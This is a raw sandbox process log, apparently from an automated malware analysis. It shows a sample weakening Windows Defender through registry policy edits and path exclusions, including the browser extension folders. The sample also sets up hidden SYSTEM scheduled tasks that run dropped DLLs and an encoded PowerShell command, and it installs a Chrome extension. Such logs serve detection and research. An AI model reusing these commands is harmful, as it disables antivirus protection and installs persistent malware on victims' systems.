C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2004
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1084
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:952 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:323⤵PID:4540
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:324⤵PID:4424
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:643⤵PID:3916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:323⤵PID:452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:643⤵PID:4968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:323⤵PID:3668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:643⤵PID:3884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:323⤵PID:5048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:643⤵PID:2152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:323⤵PID:4740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:643⤵PID:3656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:323⤵PID:3080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:643⤵PID:4604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:323⤵PID:3988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:643⤵PID:2988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:323⤵PID:840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:643⤵PID:1272
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gPeTzpkvU" /SC once /ST 04:11:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gPeTzpkvU"2⤵PID:4324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gPeTzpkvU"2⤵PID:4600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MWViHNuTpmRlpInKg" /SC once /ST 02:44:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe\" Ci /OUsite_idPoC 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2648
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MWViHNuTpmRlpInKg"2⤵PID:4016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3092 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1284
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2420
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2156
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2304
-
C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exeC:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe Ci /OUsite_idPoC 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2312 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bpJjqbWMDOjxkYrvBb"2⤵PID:3060
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4540
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:1652
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:3652
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2288 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3188
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qBvbbKpBU\EXcBdZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wbeMFPOaxEodGIM" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2272 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4968
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wbeMFPOaxEodGIM2" /F /xml "C:\Program Files (x86)\qBvbbKpBU\cLAALdr.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "wbeMFPOaxEodGIM"2⤵PID:3972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wbeMFPOaxEodGIM"2⤵PID:2476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ahmsGQGyepwQnm" /F /xml "C:\Program Files (x86)\fZHZowTYSgfU2\jQhmmpX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NOwjEMTwOUYCj2" /F /xml "C:\ProgramData\nxeoDZreGracWIVB\ihclmox.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZeWhkVIxDswmIVkZF2" /F /xml "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\QKJRxWV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rhpwGKPBtZLjUbFdohf2" /F /xml "C:\Program Files (x86)\epUZFeichsCPC\zcKfbEk.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BinjFlxHFUMMGNOij" /SC once /ST 02:58:12 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\JHEwijpMlSQrgvQB\UuWunfYY\ZPQQAfy.dll\",#1 /eesite_idjzI 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3876
-
-
